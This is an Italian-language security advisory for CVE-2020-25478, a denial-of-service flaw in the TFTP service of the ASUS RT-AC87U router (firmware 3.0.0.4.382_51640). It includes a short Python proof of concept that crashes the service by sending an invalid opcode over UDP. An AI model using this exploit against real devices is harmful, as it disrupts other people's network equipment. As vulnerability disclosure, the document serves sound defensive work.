
ASUS RT-AC87U TFTP è vulnerabile ad attacchi di Denial of Service (DoS).
CVE-2020-25478 - Il TFTP di ASUS RT-AC87U è vulnerabile ad un attacco Denial of Service (DoS)
ASUS RT-AC87U 3.0.0.4.382_51640
È principalmente correlato a CWE-20, il servizio TFTP in esecuzione su ASUS RT-AC87U è vulnerabile ad un attacco Denial of Service (DoS) quando viene inviato un opcode non valido al servizio. Il seguente snippet di codice Python viene utilizzato per testare la vulnerabilità:
import socket
import sys
tftpd = ('192.168.1.1', 69)
#Try and open an UDP SOCKET
try:
tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Failed on socket creation, so exiting")
sys.exit(1)
#create a invalid opcode exeeding the 2 byte length
# opcode operation
# 1 Read request (RRQ)
# 2 Write request (WRQ)
# 3 Data (DATA)
# 4 Acknowledgment (ACK)
# 5 Error (ERROR)
invalidOpcode = "0000"
tftp.sendto(invalidOpcode,tftpd)
3. DESCRIZIONE
Asus RT-AC87U versione 3.0.0.4.382_51640 è vulnerabile ad un attacco Denial of Service sul servizio TFTP, causando il crash del servizio TFTP. Il servizio TFTP è soggetto a crash remoto inviando un opcode non valido.
https://www.asus.com/content/ASUS-Product-Security-Advisory/